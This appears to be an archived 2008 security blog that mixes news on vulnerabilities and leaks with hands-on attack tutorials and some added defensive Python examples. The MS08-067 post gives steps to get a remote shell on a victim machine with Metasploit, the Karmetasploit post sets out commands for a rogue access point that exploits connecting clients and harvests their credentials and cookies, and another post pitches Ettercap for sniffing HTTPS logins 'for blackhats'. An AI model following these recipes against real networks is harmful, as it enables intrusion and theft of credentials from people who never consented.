Nov 21

Apple recently patched a vulnerability that Nitesh “Leisure Suit” Dhanjani and I reported to them last week (CVE-2008-4216). We had reported a similar vulnerability to Apple about two months ago (CVE-2008-3638). In fact, the exploitation technique was so similar that we held off releasing details until this second patch was released.
The basic gist of this vulnerability is that it pits a browser and a browser plug-in against each other in order to cross a subtle but important boundary. The issue starts simply enough, with a victim visiting an attacker’s web page. Once the victim is on the attacker’s page, the attacker simply loads a Java applet. Inside the applet is a call to getAppletContext().showDocument(URL); Code here

Nov 21

The PDF document holds a single-page scan of an internally distributed mail from the German telecommunications company T-Systems (Deutsche Telekom), revealing over two dozen secret IP address ranges in use by the German intelligence service Bundesnachrichtendienst (BND). Independent evidence shows that the claim is almost certainly true, and the document itself has been verified by a demand letter from T-Systems to Wikileaks. The LIST OF IPS

Nov 15

How to exploit the latest MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution).

1) First download the MS08-067 check tool from http://labs.portcullis.co.uk/application/ms08-067-check/
to see if the target host is vulnerable to this exploit.

2) Unzip it: tar -xvf ms08-067_check-0.5.tar.gz and cd ms08-067_check-0.5/

3) python ms08-067_check-0.5.py -t 192.168.1.101 (check whether the target machine is vulnerable or not)

my target is Windows XP SP2

4) Then open Framework3-MsfGUI.

5) Click exploit/windows/smb/ms08_067_netapi

6) Then select the target OS and use windows/shell/reverse_tcp as the payload

7) Add the victim IP, leave the default settings and click Next; now the payload runs

8) Double-click the session and you will get a command prompt on the victim system.

Below is the video tutorial for the above steps

MS08-067

This tutorial is dedicated to my close friend Bond

Imagination by WirelessPunter

Nov 10

Yesterday Viruslist detected the onset of the latest mass hack attack: websites being hacked and links placed on them that lead to malicious servers. They estimate that in the last two days alone, between 2,000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this.

How do the attacks work?
The attackers add a tag to the HTML of the hacked sites.
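One way a site owner can look for this symptom is to list every external script include on a page and compare its host against the site’s own hosts. The Python below is an added example written for this page, not code from Viruslist or from the report above; the HTML snippet and the trusted host list are constructed for the example, and 203.0.113.7 is a documentation address standing in for a server the site does not control.

```python
"""Flag <script src=...> includes that point outside a site's own hosts.

Added example: a page that has been modified to load code from a
third-party server shows up as a script include whose host is not one
of the site's own. The HTML and host list below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: the hosts this (fictional) site legitimately serves scripts from.
TRUSTED_HOSTS = {"www.example-shop.test", "static.example-shop.test"}

# Constructed page: one relative include, one legitimate external include,
# one inline script, and one include pointing at an unknown server.
SAMPLE_HTML = """\
<html><head>
<script src="/js/app.js"></script>
<script src="https://static.example-shop.test/jquery.js"></script>
<script type="text/javascript">var x = 1;</script>
</head><body>
<p>Welcome</p>
<script src="http://203.0.113.7/b.js"></script>
</body></html>
"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def external_script_hosts(html, trusted_hosts):
    """Return the src URLs whose host is not in trusted_hosts.

    Relative URLs have no host, are same-origin, and are not reported.
    Protocol-relative URLs (//host/x.js) do carry a host and are checked.
    """
    collector = ScriptSrcCollector()
    collector.feed(html)
    suspicious = []
    for src in collector.sources:
        host = urlparse(src).hostname
        if host is None:
            continue
        if host.lower() not in trusted_hosts:
            suspicious.append(src)
    return suspicious


if __name__ == "__main__":
    for src in external_script_hosts(SAMPLE_HTML, TRUSTED_HOSTS):
        print("untrusted script include:", src)
```

The check covers only includes with an external src; an injection written as an inline script would need a separate comparison of the page against a known-good copy.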

Nov 9

WEP Wi-Fi security has been known as an easy-to-crack protocol for a while now, which is why it was superseded by the more secure Wi-Fi Protected Access (WPA) standard. But now a PhD candidate studying encryption has found an exploit in the WPA standard that would allow a hacker to “send bogus data to an unsuspecting WiFi client,” completely compromising your Wi-Fi security and opening your network to all sorts of hacking. Lucky for you, it’s not terribly difficult to protect yourself against the new exploit.
The key: just log into your router, switch off Temporal Key Integrity Protocol (TKIP) as an encryption mode, and use Advanced Encryption Standard (AES) only. TKIP is the only protocol the hack applies to, so switching to AES-only will ensure that your Wi-Fi network is safe again. It’s quick and easy, so do yourself a favor and make the adjustment now so you don’t run into any problems in the future.
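The same “TKIP off, AES only” change on an access point you run yourself, in hostapd’s configuration format, as an added example that is not from the article: the audit function lists the cipher directives that still permit TKIP, and the hardening function rewrites them to CCMP, which is the AES mode. The directive names wpa_pairwise and rsn_pairwise are hostapd’s own; the sample configuration below is constructed.

```python
"""Audit a hostapd-style configuration for TKIP and produce an AES-only copy.

Added example. wpa_pairwise (ciphers offered to WPA clients) and
rsn_pairwise (ciphers offered to WPA2 clients) are real hostapd
directives; the configuration text is constructed for this example.
"""

# Constructed sample: a "mixed mode" AP that still offers TKIP to WPA clients.
SAMPLE_CONF = """\
interface=wlan0
ssid=homenet
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=constructed-sample-passphrase
# mixed mode: TKIP for WPA clients, CCMP for WPA2 clients
wpa_pairwise=TKIP CCMP
rsn_pairwise=CCMP
"""

# The two directives that select the pairwise cipher.
CIPHER_KEYS = ("wpa_pairwise", "rsn_pairwise")


def parse_conf(text):
    """Return (key, value) pairs in file order, skipping blanks and comments."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        pairs.append((key.strip(), value.strip()))
    return pairs


def find_tkip(text):
    """List the cipher directives whose value still includes TKIP."""
    findings = []
    for key, value in parse_conf(text):
        if key in CIPHER_KEYS and "TKIP" in value.upper().split():
            findings.append(key)
    return findings


def harden(text):
    """Return a copy of the config with both cipher directives set to CCMP only.

    Everything else, including comments and ordering, is left untouched so
    the result can be diffed against the original.
    """
    out = []
    for raw in text.splitlines():
        stripped = raw.strip()
        if stripped and not stripped.startswith("#") and "=" in stripped:
            key = stripped.split("=", 1)[0].strip()
            if key in CIPHER_KEYS:
                raw = f"{key}=CCMP"
        out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("directives still offering TKIP:", find_tkip(SAMPLE_CONF))
    print(harden(SAMPLE_CONF))
```

Clients that can only do TKIP will no longer associate after the change; that is the intended trade, since those clients are exactly the ones the attack could feed forged frames to.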

Nov 7

Security researchers have cracked the Wi-Fi Protected Access (WPA) encryption standard used to protect data on many wireless networks, according to a presentation at next week’s PacSec conference in Tokyo.

There, researcher Erik Tews will show how he was able to crack WPA encryption, in order to read data being sent from a router to a laptop computer. The attack could also be used to send bogus information to a client connected to the router.

To do this, Tews and his co-researcher Martin Beck found a way to break the Temporal Key Integrity Protocol (TKIP) key, used by WPA, in just 12 to 15 minutes, according to Dragos Ruiu, the conference’s organiser.

They have not, however, managed to crack the encryption keys used to secure data that goes from the PC to the router in this particular attack.

Security experts had known that TKIP could be cracked using what’s known as a dictionary attack. Using massive computational resources, the attacker essentially cracks the encryption by making an extremely large number of educated guesses as to what key is being used to secure the wireless data.

The work of Tews and Beck does not involve a dictionary attack, however.

To pull off their trick, the researchers first discovered a way to trick a WPA router into sending them large amounts of data. This makes cracking the key easier, but the technique is also combined with a “mathematical breakthrough” that lets them crack WPA much more quickly than any previous attempt, Ruiu said.

Tews is planning to publish the cryptographic work in an academic journal, Ruiu said. Some of the code used in the attack was quietly added to Beck’s Aircrack-ng Wi-Fi encryption hacking tool two weeks ago, he added.

WPA is widely used on today’s Wi-Fi networks and is considered a better alternative to the original WEP (Wired Equivalent Privacy) standard, which was developed in the late 1990s.

Soon after the development of WEP, however, hackers found a way to break its encryption and it is now considered insecure by most security professionals. Store chain T.J. Maxx was in the process of upgrading from WEP to WPA encryption when it experienced one of the most widely publicised data breaches in U.S. history, in which hundreds of millions of credit card numbers were stolen over a two-year period.

A new wireless standard known as WPA2 is considered safe from the attack developed by Tews and Beck, but many WPA2 routers also support WPA.

“Everybody has been saying, ‘Go to WPA because WEP is broken,’” Ruiu said. “This is a break in WPA.”

Nov 5

Hi friends, today I will be showing a few things on how to use Ettercap-NG for blackhats, and below are the topics I will be covering.

1) Sniffing HTTPS login passwords.
2) See the remote users Browsing websites.
3) Capturing remote users browser Images.

Of course we don’t recommend breaking the law, and it’s your responsibility to check your local
laws and abide by them. Don’t blame us when a three-letter organization knocks on your door.

Below is the video tutorial

Ettercap for Blackhats

Imagination By

WirelessPunter

http://thewifihack.com/blog/

Nov 3

A new open-source tool called Crapto1 could allow hackers free travel on the London Underground by decrypting communication data between RFID chips and readers. The Oyster card system is based around the Mifare chip, which uses an encryption algorithm called Crypto1. An attack against this algorithm was recently detailed in an academic paper from Radboud University in the Netherlands, and it is this attack that Crapto1 implements.

“I’m not aware of any other public implementations at this time, so I decided to write my own. This code implements the cryptography needed to decrypt captured communications between Crypto1-based tags and readers, and even recover the shared secret,” says the project homepage on Google Code.

http://www.pcpro.co.uk/news/233463/oyster-hacked-by-opensource-tool.html

Nov 2

If you use Chrome you should be aware of Incognito mode; if not, Incognito mode lets you browse in a safer way. Maybe you travel a lot with your laptop and don’t want a bunch of private information on a machine that might be stolen. Right now this mode is optional in Google Chrome: you have to select it each time. If you want Google Chrome to always open in Incognito mode, Michael T. Bee sent us a convenient script that starts Chrome in Incognito mode automatically. Here it is in all its glory:

//Chrome_Incognito.js - start a new chrome incognito window (sort of)
var liWait = 175; // wait in ms (double it on an older PC)

var oSh = new ActiveXObject("WScript.Shell");
oSh.Run("chrome.exe");      // start chrome
WScript.Sleep(liWait);
oSh.SendKeys("^+N");        // Ctrl+Shift+N: open a new incognito window
WScript.Sleep(liWait);
oSh.SendKeys("%{Tab}");     // Alt+Tab: go back to the previous (first) browser window
WScript.Sleep(liWait);
oSh.SendKeys("%{F4}");      // Alt+F4: close the first browser window

Just drop this in Notepad and save it as chrome_incognito.js on your desktop. When you double-click it, it will launch Chrome, open an Incognito window, and then close the first window. It does all this by sending artificial keypress events to the application through the WScript.Shell ActiveX object, a technique that might come in handy for scripting other standard Windows applications. Because SendKeys types into whichever window has focus at that moment, the wait value matters: if Chrome is slow to appear, the keystrokes, including the Alt+F4, land in some other application instead.

Nov 1

Hi friends, today I will be showing you how to have fun with Karmetasploit.

Prerequisites

1) Update Aircrack-ng
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
# make
# make install

2) Update Metasploit

Click the KDE menu and go to Backtrack -> Penetration -> framework3 -> framework3-msfUpdate

3) Then first check that your wifi card is able to go into monitor mode and inject

Monitor mode : airmon-ng start wifi0 [wifi-interface]
Inject       : aireplay-ng --test [monitor-interface]
aireplay-ng --test ath0
14:00:07  Trying broadcast probe requests…
14:00:09  No Answer…
14:00:09  Found 1 AP

14:00:09  Trying directed probe requests…
14:00:09  00:1C:10:26:A9:39 - channel: 11 - ‘linksys’
14:00:14  Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
14:00:14  15/30:  50%
14:00:14  Injection is working!

Cool. If injection is not working then stop here and patch the drivers.

4) Then download karma.rc from

http://metasploit.com/users/hdm/tools/karma.rc

and place it in /pentest/exploits/framework3, replacing the existing file.

5) Download Karmetasploit from http://www.darkoperator.com/kmsapng.tgz

tar -xvf kmsapng.tgz

6) Then open kmsapng.sh in kwrite and, on line 149, change the Metasploit path to the one below

/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc && cleanup

The script will do the following
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set in iptables a redirect of all traffic to itself so as to bypass cached DNS entries
- Start Metasploit.

The script will create a log file in /root called karma.log, as well as a sqlite db and a capture file, all in the same folder.

7) Run the script from the terminal

./kmsapng.sh -i ath0 -m km -s freeinternet   (ath0 is your card; linksys is your AP name, you can give anything)

8) Now your fun AP is up.
As clients connect to the access point and try to access the network, the service modules will do what they can to extract information from the client and exploit browser vulnerabilities. All of this information is logged to the SQLite3 database, which is specified as /root/karma.db in the sample resource file. At any time, the “db_notes” command can be used to look at the captured credentials and requests. Starting up tcpdump on the ath0 interface and capturing all traffic to a file is often a good idea as well, just in case something sensitive comes across the network that Metasploit doesn’t know about yet.

9) Finally, see the credentials and cookie logs using these commands

sqlite3 karma.db
sqlite>.mode html
sqlite>.output karma.html
sqlite> select * from notes;

and you can see the details in karma.html

below is the link for video tutorial
Karmetasploit

Tutorial by

WirelessPunter
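For the defending side, a KARMA-style access point is recognisable precisely because it answers probe requests for any network name, so one BSSID is observed offering many different SSIDs. The Python below is an added example, not part of the tutorial above or of Karmetasploit or Karma: it takes (bssid, ssid) pairs as a passive monitor would record them from probe responses and flags BSSIDs answering with an unusual number of distinct names. The observations, MAC addresses and the threshold value are constructed for the example.

```python
"""Spot a KARMA-style rogue access point from observed probe responses.

Added example. Input is a list of (bssid, ssid) pairs as a passive
monitor would log them from probe-response frames; the sample data
below is constructed, and the MAC addresses are made up.
"""
from collections import defaultdict

# Constructed observations. The second BSSID answers with four different
# names, which is what a KARMA AP looks like from the outside.
SAMPLE_OBSERVATIONS = [
    ("00:11:22:33:44:55", "linksys"),
    ("00:11:22:33:44:55", "linksys"),
    ("66:77:88:99:AA:BB", "freeinternet"),
    ("66:77:88:99:AA:BB", "CoffeeShopWiFi"),
    ("66:77:88:99:AA:BB", "HomeNet"),
    ("66:77:88:99:AA:BB", "attwifi"),
    ("CC:DD:EE:FF:00:11", "guest"),
    ("CC:DD:EE:FF:00:11", "corp"),
]


def ssids_per_bssid(observations):
    """Map each BSSID (normalised to upper case) to the set of SSIDs it answered with."""
    seen = defaultdict(set)
    for bssid, ssid in observations:
        seen[bssid.upper()].add(ssid)
    return seen


def suspicious_bssids(observations, threshold=3):
    """Return BSSIDs that answered with at least `threshold` distinct SSIDs,
    most names first.

    A normal AP advertises one SSID per BSSID. Some small APs reuse one
    BSSID for a second (guest) network, which is why the constructed
    default threshold is 3 rather than 2; tune it for the environment.
    """
    counts = {b: len(s) for b, s in ssids_per_bssid(observations).items()}
    flagged = [b for b, n in counts.items() if n >= threshold]
    return sorted(flagged, key=lambda b: (-counts[b], b))


if __name__ == "__main__":
    for bssid in suspicious_bssids(SAMPLE_OBSERVATIONS):
        names = sorted(ssids_per_bssid(SAMPLE_OBSERVATIONS)[bssid])
        print(f"{bssid} answered for {len(names)} SSIDs: {', '.join(names)}")
```

A client-side defence follows from the same observation: remove saved open networks the machine no longer needs, so it stops probing for names a rogue AP would happily claim.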
